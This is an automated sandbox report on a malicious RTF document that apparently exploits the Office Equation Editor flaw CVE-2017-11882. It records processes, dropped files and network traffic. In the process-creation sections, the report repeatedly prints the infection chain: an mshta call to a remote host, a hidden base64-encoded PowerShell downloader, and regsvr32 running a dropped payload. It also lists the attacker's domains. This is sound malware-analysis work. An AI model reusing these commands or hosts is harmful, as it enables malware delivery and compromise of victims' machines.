Analysis Report

Overview

General Information

Joe Sandbox Version:	21.0.0
Analysis ID:	37746
Start time:	22:20:47
Joe Sandbox Product:	CloudBasic
Start date:	21.11.2017
Overall analysis duration:	0h 7m 46s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	5ZFXLxew8B.rtf
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1)
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies	HCA enabled EGA enabled GSI enabled (VBA) GSI enabled (Javascript)
Detection:	MAL
Classification:	mal80.expl.evad.winRTF@10/22@2/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 18 Number of non-executed functions: 25
Cookbook Comments:	Found application associated with file extension: .rtf Found Word or Excel or PowerPoint document Simulate clicks Number of clicks 0 Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, conhost.exe, WmiApSrv.exe, svchost.exe Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: WINWORD.EXE, powershell.exe

Detection

Strategy	Score	Range	Reporting	Detection
Threshold	80	0 - 100	Report FP / FN

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Analysis Advice

Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis

Signature Overview

Click to jump to signature section

Exploits:

Office Equation Editor has been started

Show sources

Source: unknown

Process created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Office equation editor starts processes (likely CVE 2017-11882)

Show sources

Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE

Process created: C:\Windows\System32\mshta.exe

Spreading:

Enumerates the file system

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Show sources

Source: global traffic

DNS query: name: zstorage.biz

Potential document exploit detected (performs HTTP gets)

Show sources

Source: global traffic

TCP traffic: 192.168.2.2:49164 -> 185.82.23.166:443

Potential document exploit detected (unknown TCP traffic)

Show sources

Source: global traffic

TCP traffic: 192.168.2.2:49164 -> 185.82.23.166:443

Networking:

Downloads files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word

Found strings which match to known social media urls

Show sources

Source: msxsl.exe	String found in binary or memory: $mail.yahoo.org.kz.( equals www.yahoo.com (Yahoo)
Source: msxsl.exe	String found in binary or memory: kFhttps://mail.yahoo.org.kz/v/img.phpU equals www.yahoo.com (Yahoo)
Source: mshta.exe, powershell.exe	String found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
Source: mshta.exe, powershell.exe	String found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: msxsl.exe	String found in binary or memory: mail.yahoo.org.kz equals www.yahoo.com (Yahoo)
Source: msxsl.exe	String found in binary or memory: mail.yahoo.org.kz% equals www.yahoo.com (Yahoo)
Source: msxsl.exe	String found in binary or memory: mail.yahoo.org.kz5 equals www.yahoo.com (Yahoo)
Source: msxsl.exe	String found in binary or memory: mail.yahoo.org.kz>v equals www.yahoo.com (Yahoo)
Source: msxsl.exe	String found in binary or memory: tmail.yahoo.org.kz equals www.yahoo.com (Yahoo)
Source: msxsl.exe	String found in binary or memory: var Gate = "https://mail.yahoo.org.kz/v/img.php"; equals www.yahoo.com (Yahoo)
Source: mshta.exe, powershell.exe	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: zstorage.biz

Urls found in memory or binary data

Show sources

Source: powershell.exe	String found in binary or memory: file://
Source: WINWORD.EXE, powershell.exe	String found in binary or memory: file:///
Source: WINWORD.EXE	String found in binary or memory: file:///C:
Source: mshta.exe	String found in binary or memory: file:///C:/Users/Herb%20Blackburn/AppData/Local/Microsoft/Windows/Temporary%20Internet%20Files/Conte
Source: msxsl.exe	String found in binary or memory: file:///C:/Users/Herb%20Blackburn/AppData/Roaming/Microsoft/
Source: msxsl.exe	String found in binary or memory: file:///C:/Users/Herb%20Blackburn/AppData/Roaming/Microsoft/CAF9DEB8F.txt
Source: msxsl.exe	String found in binary or memory: file:///C:/Users/Herb%20Blackburn/AppData/Roaming/Microsoft/CAF9DEB8F.txtl
Source: msxsl.exe	String found in binary or memory: file:///C:/Users/Herb%20Blackburn/AppData/Roaming/Microsoft/CAF9DEB8F.txtro
Source: msxsl.exe	String found in binary or memory: file:///C:/Users/Herb%20Blackburn/AppData/Roaming/Microsoft/D32E4DB3961AD18.txt
Source: WINWORD.EXE	String found in binary or memory: file:///C:/Users/Herb%20Blackburn/Desktop/5ZFXLxew8B.rtf
Source: WINWORD.EXE	String found in binary or memory: file:///C:/Users/Herb%20Blackburn/Desktop/5ZFXLxew8B.rtfz
Source: powershell.exe	String found in binary or memory: file:///C:/Windows/Microsoft.NET/Framework/v2.0.50727/mscorlib.dll
Source: powershell.exe	String found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0/
Source: powershell.exe	String found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0/6
Source: powershell.exe	String found in binary or memory: file:///C:/Windows/assembly/GAC_32/System.Transactions/2.0.0.0__b77a5c561934e089/System.Transactions
Source: powershell.exe	String found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.Commands.Diagnostics/1.0.0.0__31bf3856ad36
Source: powershell.exe	String found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.Commands.Management/1.0.0.0__31bf3856ad364
Source: powershell.exe	String found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.Commands.Utility/1.0.0.0__31bf3856ad364e35
Source: powershell.exe	String found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.ConsoleHost/1.0.0.0__31bf3856ad364e35/Micr
Source: powershell.exe	String found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.Security/1.0.0.0__31bf3856ad364e35/Microso
Source: powershell.exe	String found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.WSMan.Management/1.0.0.0__31bf3856ad364e35/Microsoft.
Source: powershell.exe	String found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/System.Configuration.Install/2.0.0.0__b03f5f7f11d50a3a/System.C
Source: powershell.exe	String found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/System.Core/3.5.0.0__b77a5c561934e089/System.Core.dll
Source: powershell.exe	String found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/System.DirectoryServices/2.0.0.0__b03f5f7f11d50a3a/System.Direc
Source: powershell.exe	String found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/System.Management.Automation/1.0.0.0__31bf3856ad364e35/System.M
Source: powershell.exe	String found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/System.Management/2.0.0.0__b03f5f7f11d50a3a/System.Management.d
Source: powershell.exe	String found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/System.Xml/2.0.0.0__b77a5c561934e089/System.Xml.dll
Source: powershell.exe	String found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/System/2.0.0.0__b77a5c561934e089/System.dll
Source: msxsl.exe	String found in binary or memory: file://C:
Source: mshta.exe, powershell.exe	String found in binary or memory: http://
Source: msxsl.exe	String found in binary or memory: http://8.8.8.8/
Source: mshta.exe	String found in binary or memory: http://U
Source: mshta.exe, powershell.exe	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: powershell.exe	String found in binary or memory: http://c
Source: mshta.exe, powershell.exe	String found in binary or memory: http://cert.int-x3.letsencrypt.org/0
Source: mshta.exe, powershell.exe	String found in binary or memory: http://cps.letsencrypt.org0
Source: mshta.exe, powershell.exe	String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: mshta.exe, powershell.exe	String found in binary or memory: http://crl.comodo.net/UTN-USERFirst-Hardware.crl0q
Source: mshta.exe, powershell.exe	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: mshta.exe, powershell.exe	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: mshta.exe, powershell.exe	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: mshta.exe, powershell.exe	String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: mshta.exe, powershell.exe	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: mshta.exe, powershell.exe	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: mshta.exe, powershell.exe	String found in binary or memory: http://crl.usertrust.com/UTN-USERFirst-Object.crl0)
Source: mshta.exe, powershell.exe	String found in binary or memory: http://crt.comodoca.com/UTNAddTrustServerCA.crt0$
Source: mshta.exe	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: mshta.exe	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enb
Source: mshta.exe, powershell.exe	String found in binary or memory: http://cybertrust.omniroot.com/repository.cfm0
Source: E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08.3.dr	String found in binary or memory: http://isrg.trustid.ocsp.identrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUx
Source: mshta.exe, powershell.exe	String found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
Source: mshta.exe	String found in binary or memory: http://isrg.trustid.ocsp.identrust.comhttp://crl.identrust.com/DSTROOTCAX3CRL.crl
Source: powershell.exe	String found in binary or memory: http://java.com/
Source: mshta.exe	String found in binary or memory: http://miclr1
Source: powershell.exe	String found in binary or memory: http://ocs
Source: powershell.exe	String found in binary or memory: http://ocsp
Source: mshta.exe, powershell.exe	String found in binary or memory: http://ocsp.comodoca.com0
Source: mshta.exe, powershell.exe	String found in binary or memory: http://ocsp.comodoca.com0%
Source: mshta.exe, powershell.exe	String found in binary or memory: http://ocsp.comodoca.com0-
Source: mshta.exe, powershell.exe	String found in binary or memory: http://ocsp.comodoca.com0/
Source: mshta.exe, powershell.exe	String found in binary or memory: http://ocsp.comodoca.com05
Source: mshta.exe, powershell.exe	String found in binary or memory: http://ocsp.entrust.net03
Source: mshta.exe, powershell.exe	String found in binary or memory: http://ocsp.entrust.net0D
Source: mshta.exe, powershell.exe	String found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/
Source: powershell.exe	String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/cimbinding/associationFilter
Source: powershell.exe	String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/wsman/SelectorFilter
Source: powershell.exe	String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd#IdentifyResponse
Source: mshta.exe, powershell.exe	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: mshta.exe, powershell.exe	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: mshta.exe	String found in binary or memory: http://www.microsoft.
Source: WINWORD.EXE	String found in binary or memory: http://www.msnusers.comd
Source: mshta.exe, powershell.exe	String found in binary or memory: http://www.public-trust.com/CPS/OmniRoot.html0
Source: mshta.exe, powershell.exe	String found in binary or memory: http://www.public-trust.com/cgi-bin/CRL/2018/cdp.crl0
Source: powershell.exe	String found in binary or memory: http://www.us
Source: mshta.exe, powershell.exe	String found in binary or memory: http://www.usertrust.com1
Source: powershell.exe	String found in binary or memory: http://www.usust.
Source: mshta.exe	String found in binary or memory: http://z
Source: mshta.exe, powershell.exe	String found in binary or memory: https://letsencrypt.org/repository/0
Source: msxsl.exe	String found in binary or memory: https://mail.yahoo.org.kz/v/img.php
Source: msxsl.exe	String found in binary or memory: https://mail.yahoo.org.kz/v/img.phpU
Source: mshta.exe, powershell.exe	String found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe	String found in binary or memory: https://zsto
Source: powershell.exe	String found in binary or memory: https://zstorage
Source: powershell.exe	String found in binary or memory: https://zstorage.biz
Source: mshta.exe	String found in binary or memory: https://zstorage.biz/
Source: mshta.exe	String found in binary or memory: https://zstorage.biz/E
Source: powershell.exe	String found in binary or memory: https://zstorage.biz/f111.txT
Source: powershell.exe	String found in binary or memory: https://zstorage.biz/f111.txt
Source: powershell.exe	String found in binary or memory: https://zstorage.biz/f111.txtt
Source: mshta.exe	String found in binary or memory: https://zstorage.biz/read.txt
Source: mshta.exe	String found in binary or memory: https://zstorage.biz/read.txt&XXXXXX
Source: mshta.exe	String found in binary or memory: https://zstorage.biz/read.txt...
Source: mshta.exe	String found in binary or memory: https://zstorage.biz/read.txt...a
Source: mshta.exe	String found in binary or memory: https://zstorage.biz/read.txtC:
Source: mshta.exe	String found in binary or memory: https://zstorage.biz/read.txtZ
Source: mshta.exe	String found in binary or memory: https://zstorage.biz/read.txttC
Source: powershell.exe	String found in binary or memory: https://zstorageX

Uses HTTPS

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 49164 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49164
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a window with clipboard capturing capabilities

Show sources

Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mshta.exe	Window created: window name: CLIPBRDWNDCLASS

E-Banking Fraud:

Drops certificate files (DER)

Show sources

Source: C:\Windows\System32\mshta.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
Source: C:\Windows\System32\mshta.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08

System Summary:

Checks whether correct version of .NET is installed

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Upgrades

Reads internet explorer settings

Show sources

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_USERS\Software\Microsoft\Internet Explorer\Settings

Found graphical window changes (likely an installer)

Show sources

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Checks if Microsoft Office is installed

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_USERS\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll

Binary contains paths to debug symbols

Show sources

Source:	Binary string: scrrun.pdb source: msxsl.exe
Source:	Binary string: mscorrc.pdb source: powershell.exe

Classification label

Show sources

Source: classification engine

Classification label: mal80.expl.evad.winRTF@10/22@2/1

Contains functionality to enum processes or threads

Show sources

Source: C:\Windows\System32\regsvr32.exe

Code function: 9_1_10001353 CreateToolhelp32Snapshot,

9_1_10001353

Creates files inside the user directory

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$FXLxew8B.rtf

Creates temporary files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\HERBBL~1\AppData\Local\Temp\CVR1597.tmp

Parts of this applications are using the .NET runtime (Probably coded in C#)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp

Reads ini files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Reads software policies

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Spawns processes

Show sources

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\5ZFXLxew8B.rtf
Source: unknown	Process created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Windows\System32\mshta.exe mshta https://zstorage.biz/read.txt & XXXXXX C
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NOp -NOnI -w hIdden -e 'JABsAHcANgAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHoAcwB0AG8AcgBhAGcAZQAuAGIAaQB6AC8AZgAxADEAMQAuAHQAeAB0ACcAKQA7ACQAbgBnAEMAbQBJAHcAWQAgAD0AIABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAbAB3ADYAKQA7ACQAagAxAFoAUwBLAFYARQBEADMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgACcAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAE0AYQBuAGEAZwBlAGQAJwA7ACQAagAxAFoAUwBLAFYARQBEADMALgBNAG8AZABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEMAaQBwAGgAZQByAE0AbwBkAGUAXQA6ADoAQwBCAEMAOwAkAGoAMQBaAFMASwBWAEUARAAzAC4AUABhAGQAZABpAG4AZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBQAGEAZABkAGkAbgBnAE0AbwBkAGUAXQA6ADoAWg
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' /s 'C:\Users\user\AppData\Roaming\IkqJfeZNVt.txt'
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\msxsl.exe unknown
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\System32\mshta.exe mshta https://zstorage.biz/read.txt & XXXXXX C
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NOp -NOnI -w hIdden -e 'JABsAHcANgAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHoAcwB0AG8AcgBhAGcAZQAuAGIAaQB6AC8AZgAxADEAMQAuAHQAeAB0ACcAKQA7ACQAbgBnAEMAbQBJAHcAWQAgAD0AIABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAbAB3ADYAKQA7ACQAagAxAFoAUwBLAFYARQBEADMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgACcAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAE0AYQBuAGEAZwBlAGQAJwA7ACQAagAxAFoAUwBLAFYARQBEADMALgBNAG8AZABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEMAaQBwAGgAZQByAE0AbwBkAGUAXQA6ADoAQwBCAEMAOwAkAGoAMQBaAFMASwBWAEUARAAzAC4AUABhAGQAZABpAG4AZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBQAGEAZABkAGkAbgBnAE0AbwBkAGUAXQA6ADoAWg
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' /s 'C:\Users\user\AppData\Roaming\IkqJfeZNVt.txt'
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\msxsl.exe unknown

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Creates mutexes

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\CLR_PerfMon_WrapMutex

Found potential string decryption / allocating functions

Show sources

Source: C:\Windows\System32\regsvr32.exe

Code function: String function: 10004F02 appears 181 times

Reads the hosts file

Show sources

Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts

Searches for the Microsoft Outlook file path

Show sources

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Blacklisted process start detected (Windows program)

Show sources

Source: C:\Windows\System32\regsvr32.exe

Process created: C:\Users\user\AppData\Roaming\Microsoft\msxsl.exe unknown

Powershell connects to network

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Network Connect: 185.82.23.166 443

Powershell drops PE file

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\IkqJfeZNVt.txt

Very long command line found

Show sources

Source: unknown	Process created: Commandline size = 2862
Source: C:\Windows\System32\mshta.exe	Process created: Commandline size = 2862

Data Obfuscation:

PE file contains sections with non-standard names

Show sources

Source: IkqJfeZNVt.txt.7.dr

Static PE information: section name: .code

Suspicious powershell command line found

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NOp -NOnI -w hIdden -e 'JABsAHcANgAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHoAcwB0AG8AcgBhAGcAZQAuAGIAaQB6AC8AZgAxADEAMQAuAHQAeAB0ACcAKQA7ACQAbgBnAEMAbQBJAHcAWQAgAD0AIABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAbAB3ADYAKQA7ACQAagAxAFoAUwBLAFYARQBEADMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgACcAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAE0AYQBuAGEAZwBlAGQAJwA7ACQAagAxAFoAUwBLAFYARQBEADMALgBNAG8AZABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEMAaQBwAGgAZQByAE0AbwBkAGUAXQA6ADoAQwBCAEMAOwAkAGoAMQBaAFMASwBWAEUARAAzAC4AUABhAGQAZABpAG4AZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBQAGEAZABkAGkAbgBnAE0AbwBkAGUAXQA6ADoAWg
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NOp -NOnI -w hIdden -e 'JABsAHcANgAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHoAcwB0AG8AcgBhAGcAZQAuAGIAaQB6AC8AZgAxADEAMQAuAHQAeAB0ACcAKQA7ACQAbgBnAEMAbQBJAHcAWQAgAD0AIABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAbAB3ADYAKQA7ACQAagAxAFoAUwBLAFYARQBEADMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgACcAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAE0AYQBuAGEAZwBlAGQAJwA7ACQAagAxAFoAUwBLAFYARQBEADMALgBNAG8AZABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEMAaQBwAGgAZQByAE0AbwBkAGUAXQA6ADoAQwBCAEMAOwAkAGoAMQBaAFMASwBWAEUARAAzAC4AUABhAGQAZABpAG4AZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBQAGEAZABkAGkAbgBnAE0AbwBkAGUAXQA6ADoAWg

Persistence and Installation Behavior:

Drops PE files

Show sources

Source: C:\Windows\System32\regsvr32.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\msxsl.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\IkqJfeZNVt.txt

May use bcdedit to modify the Windows boot settings

Show sources

Source: powershell.exe

Binary or memory string: bcdedit.exeN

Drops files with a non-matching file extension (content does not match file extension)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\IkqJfeZNVt.txt

Installs new ROOT certificates

Show sources

